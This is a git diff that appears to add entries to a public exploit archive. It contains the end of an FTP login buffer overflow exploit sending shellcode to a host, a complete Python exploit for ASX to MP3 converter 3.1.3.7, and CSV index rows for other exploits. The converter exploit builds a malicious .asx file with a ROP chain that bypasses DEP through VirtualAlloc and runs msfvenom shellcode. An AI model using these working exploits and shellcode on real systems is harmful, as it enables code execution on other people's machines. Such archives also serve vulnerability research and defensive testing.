buf += "\x33\x35\x31\x32\x4c\x53\x53\x66\x4e\x55\x35\x72\x58"
buf += "\x45\x35\x53\x30\x41\x41"
buf = 'A' * 276
buf += '\x90' * 10
buf += shellcode
buf += 'B' * (486 - len(shellcode))
buf += '\x58' # pop eax
buf += '\xfe\xcc' # dec ah
buf += '\xfe\xcc' # dec ah
buf += '\xff\xe0' # jmp eax
buf += 'C' * 4
buf += '\xe8\xf0\xff\xff\xff' # call near
buf += 'D' * 9
buf += '\xeb\xf0\x90\x90' # jump backwards
buf += '\xc0\x3d\x42\x00' # 0x00423dc0 - pop, pop, ret
buf += 'E' * (1000 - len(buf))
ftp = FTP()
ftp.connect('192.168.1.1', 21)
ftp.login('anonymous', buf)

114
exploits/windows_x86-64/local/47468.py Executable file
View file

@ -0,0 +1,114 @@
# Exploit Title: ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)
# Google Dork: N/A
# Date: 2019-10-06
# Exploit Author: max7253
# Vendor Homepage: http://www.mini-stream.net/
# Software Link: https://www.exploit-db.com/apps/f4da5b43ca4b035aae55dfa68daa67c9-ASXtoMP3Converter.exe
# Version: 3.1.3.7.2010.11.05
# Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC
# CVE : N/A
# Note: There is a similar exploit published but it doesn't work in the OS I used:
# https://www.exploit-db.com/exploits/42963
# This exploit in the ROP chain uses addresses from ASLR modules. Not sure what OS that exploit was tested on.
import struct
file = 'fuzz_rop.asx'
#Tested on
#OS Name: Microsoft Windows 7 Enterprise
#OS Version: 6.1.7601 Service Pack 1 Build 7601
#System Type: x64-based PC
#msfvenom -p windows/exec cmd=calc.exe -a x86 -b '\x00\x09\x0a' -f python
buf = b""
buf += b"\xda\xd7\xbf\xf1\xca\xd1\x3f\xd9\x74\x24\xf4\x5a\x29"
buf += b"\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x14\x03\x7a\xe5\x28"
buf += b"\x24\xc3\xed\x2f\xc7\x3c\xed\x4f\x41\xd9\xdc\x4f\x35"
buf += b"\xa9\x4e\x60\x3d\xff\x62\x0b\x13\x14\xf1\x79\xbc\x1b"
buf += b"\xb2\x34\x9a\x12\x43\x64\xde\x35\xc7\x77\x33\x96\xf6"
buf += b"\xb7\x46\xd7\x3f\xa5\xab\x85\xe8\xa1\x1e\x3a\x9d\xfc"
buf += b"\xa2\xb1\xed\x11\xa3\x26\xa5\x10\x82\xf8\xbe\x4a\x04"
buf += b"\xfa\x13\xe7\x0d\xe4\x70\xc2\xc4\x9f\x42\xb8\xd6\x49"
buf += b"\x9b\x41\x74\xb4\x14\xb0\x84\xf0\x92\x2b\xf3\x08\xe1"
buf += b"\xd6\x04\xcf\x98\x0c\x80\xd4\x3a\xc6\x32\x31\xbb\x0b"
buf += b"\xa4\xb2\xb7\xe0\xa2\x9d\xdb\xf7\x67\x96\xe7\x7c\x86"
buf += b"\x79\x6e\xc6\xad\x5d\x2b\x9c\xcc\xc4\x91\x73\xf0\x17"
buf += b"\x7a\x2b\x54\x53\x96\x38\xe5\x3e\xfc\xbf\x7b\x45\xb2"
buf += b"\xc0\x83\x46\xe2\xa8\xb2\xcd\x6d\xae\x4a\x04\xca\x40"
buf += b"\x01\x05\x7a\xc9\xcc\xdf\x3f\x94\xee\x35\x03\xa1\x6c"
buf += b"\xbc\xfb\x56\x6c\xb5\xfe\x13\x2a\x25\x72\x0b\xdf\x49"
buf += b"\x21\x2c\xca\x29\xa4\xbe\x96\x83\x43\x47\x3c\xdc"
payload = "http://"
payload += "A" * 17417 + struct.pack('<L', 0x1002D038) + "CCCC"
## Save allocation type (0x1000) in EDX
payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
payload += struct.pack('<L', 0x11111111)
payload += struct.pack('<L', 0x10029B8C) # XOR EDX,EDX # RETN
payload += struct.pack('<L', 0x1002D493) # POP EDX # RETN
payload += struct.pack('<L', 0xEEEEFEEF)
payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
payload += struct.pack('<L', 0x41414141)
## Save the address of VirtualAlloc() in ESI
payload += struct.pack('<L', 0x1002fade) # POP EAX # RETN [MSA2Mfilter03.dll]
payload += struct.pack('<L', 0x1004f060) # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
payload += struct.pack('<L', 0x1003239f) # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll]
payload += struct.pack('<L', 0x10040754) # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
payload += struct.pack('<L', 0x41414141)
payload += struct.pack('<L', 0x41414141)
## Save the size of the block in EBX
payload += struct.pack('<L', 0x1004d881) # XOR EAX,EAX # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x10034735) # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN
## Save the address of (# ADD ESP,8 # RETN) in EBP
payload += struct.pack('<L', 0x10031c6c) # POP EBP # RETN
payload += struct.pack('<L', 0x10012316) # ADD ESP,8 # RETN
#payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN
## Save memory protection code (0x40) in ECX
payload += struct.pack('<L', 0x1002ca22) # POP ECX # RETN
payload += struct.pack('<L', 0xFFFFFFFF)
payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN
payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
## Save ROP-NOP in EDI
payload += struct.pack('<L', 0x1002e346) # POP EDI # RETN
payload += struct.pack('<L', 0x1002D038) # RETN
## Save NOPs in EAX
#payload += struct.pack('<L', 0x1003bca4) # POP EAX # RETN [MSA2Mfilter03.dll]
#payload += struct.pack('<L', 0x90909090) # nop
## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
payload += struct.pack('<L', 0x1002E516) # POP EAX # RETN
payload += struct.pack('<L', 0xA4E2F275)
payload += struct.pack('<L', 0x1003efe2) # ADD EAX,5B5D5E5F # RETN
payload += struct.pack('<L', 0x10040ce5) # PUSH EAX # RETN
payload += "\x90" * 4
payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN
payload += "\x90" * 20
payload += buf
f = open(file,'w')
f.write(payload)
f.close()

8
files_exploits.csv
View file

@ -10699,6 +10699,9 @@ id,file,description,date,author,type,platform,port
47444,exploits/windows/local/47444.py,"DameWare Remote Support 12.1.0.34 - Buffer Overflow (SEH)",2019-10-01,"Xavi Beltran",local,windows,
47454,exploits/windows/local/47454.md,"Counter-Strike Global Offensive 1.37.1.1 - 'vphysics.dll' Denial of Service (PoC)",2019-09-18,bi7s,local,windows,
47463,exploits/android/local/47463.txt,"Android - Binder Driver Use-After-Free",2019-10-04,"Google Security Research",local,android,
47466,exploits/linux/local/47466.c,"logrotten 3.15.1 - Privilege Escalation",2019-10-07,"Wolfgang Hotwagner",local,linux,
47468,exploits/windows_x86-64/local/47468.py,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",2019-10-07,max7253,local,windows_x86-64,
47471,exploits/windows/local/47471.txt,"CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation",2019-10-07,"Jakub Palaczynski",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17695,6 +17698,7 @@ id,file,description,date,author,type,platform,port
47439,exploits/multiple/remote/47439.txt,"GoAhead 2.5.0 - Host Header Injection",2019-09-30,Ramikan,remote,multiple,
47442,exploits/hardware/remote/47442.py,"Cisco Small Business 220 Series - Multiple Vulnerabilities",2019-09-30,bashis,remote,hardware,
47456,exploits/windows/remote/47456.rb,"DOUBLEPULSAR - Payload Execution and Neutralization (Metasploit)",2019-10-02,Metasploit,remote,windows,
47472,exploits/windows/remote/47472.py,"freeFTP 1.0.8 - Remote Buffer Overflow",2019-10-07,"Chet Manly",remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41797,3 +41801,7 @@ id,file,description,date,author,type,platform,port
47459,exploits/multiple/webapps/47459.py,"AnchorCMS < 0.12.3a - Information Disclosure",2019-10-03,"Tijme Gommers",webapps,multiple,
47460,exploits/php/webapps/47460.txt,"LabCollector 5.423 - SQL Injection",2019-10-04,"Carlos Avila",webapps,php,
47462,exploits/php/webapps/47462.php,"PHP 7.0 < 7.3 (Unix) - 'gc' Disable Functions Bypass",2019-10-03,mm0r1,webapps,php,
47465,exploits/php/webapps/47465.py,"Joomla 3.4.6 - 'configuration.php' Remote Code Execution",2019-10-07,"Alessandro Groppo",webapps,php,
47467,exploits/php/webapps/47467.txt,"Zabbix 4.2 - Authentication Bypass",2019-10-07,"Milad Khoshdel",webapps,php,
47469,exploits/php/webapps/47469.txt,"Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting",2019-10-07,Creatigon,webapps,php,
47470,exploits/java/webapps/47470.txt,"IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload",2019-10-07,"Jakub Palaczynski",webapps,java,

Can't render this file because it is too large.